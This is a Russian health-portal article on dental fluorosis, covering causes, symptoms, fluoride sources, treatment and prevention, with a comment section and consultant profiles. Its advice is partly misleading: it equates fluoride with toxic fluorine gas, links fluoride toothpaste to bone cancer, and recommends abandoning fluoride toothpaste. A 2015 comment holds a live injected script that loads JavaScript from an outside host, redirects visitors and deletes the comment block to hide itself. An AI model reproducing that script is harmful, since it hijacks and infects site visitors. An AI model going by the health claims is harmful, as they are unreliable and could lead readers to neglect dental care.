Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Флюороз  >>  Флюороз
 
Обратная связь
 

Флюороз

Размер шрифта
07 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Могут ли пожелтевшие зубы быть признаком флюороза? Как распознать, как лечить и как предупредить эту болезнь?

Желтые или коричневые пятна на эмали могут оказаться признаком флюороза. Это хроническое заболевание костной системы и зубов, которое встречается в регионах с избыточным содержанием фтора в питьевой воде.

Заболевание развивается еще до прорезывания зубов. Поначалу оно проявляется в виде крапинок или пятен на зубной эмали. Впоследствии флюороз может поражать костную ткань и деформировать кости скелета.

В чем причина флюороза?

Еще в 1972 году медицинские исследования показали, что фтор чрезвычайно опасен для здоровья. Фтор в своем природном виде – чрезвычайно ядовитый газ.

Избыток фтора вреден для зубов! Именно это вещество является причиной флюороза. Избыток фтора накапливается в костях и зубах, разрушая зубная эмаль. Дентин, основа зуба, становится хрупким. Скапливаясь в костях, фтор провоцирует развитие раковой опухоли – остеосаркомы.

Симптомы флюороза

Ярко-белые пятна на зубах. Со временем они темнеют.

Источники фтора

  1. Вода. Количество фтора в воде невозможно определить ни на вкус, ни на цвет: фтор бесцветен, не имеет вкуса и запаха. Повышенное содержание фтора есть в водопроводной воде в Мордовии, Ленинградской и Нижегородской областях, на Урале, в Западной Сибири, а также в регионах добычи алюминия. Также надо знать, что в подземных водах больше фтора, чем в поверхностных.

  2. Зубная паста. Фтор является химическим веществом 2-го класса опасности. По данным известного медицинского журнала Journal of Bone and Mineral Research многие боли и нарушения подвижности в суставах могут быть тесно связаны с такой безобидной и повседневной процедурой, как чистка зубов фторированой зубной пастой. Исследования показали, что при достаточно высоких дозах фтора может возникать так называемый скелетный флюороз.

Лечение

  1. При флюорозе легкой степени тяжести проводится отбеливание зубов с последующей реминирализирующей терапией, когда эмаль насыщается кальцием, фосфором, фтором. Эти соединения проникают в твердые ткани зуба, восстанавливая и укрепляя их. Фосфаты, кальций, фториды и ряд других микроэлементов входят в состав основного вещества эмали – гидроксиаппатита.

  2. При флюорозе средней и тяжелой степеней нарушается целостность эмали зубов. В таких случаях применяют светополимеры, керамические виниры или покрывают зубы коронками.

  3. При флюорозе поможет кальций. Этот элемент снижает токсическое действие фтора на организм, способствует выведению его из организма. Низкое содержание кальция в воде и пищевых продуктах усугубляет течение флюороза.

Профилактика флюороза

  1. Очищать воду через фильтр.

  2. Прекратить использовать зубную пасту с фтором.

 

Видеосюжеты по теме:

Пятна на зубах. Как от них избавиться

 

 

 


 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.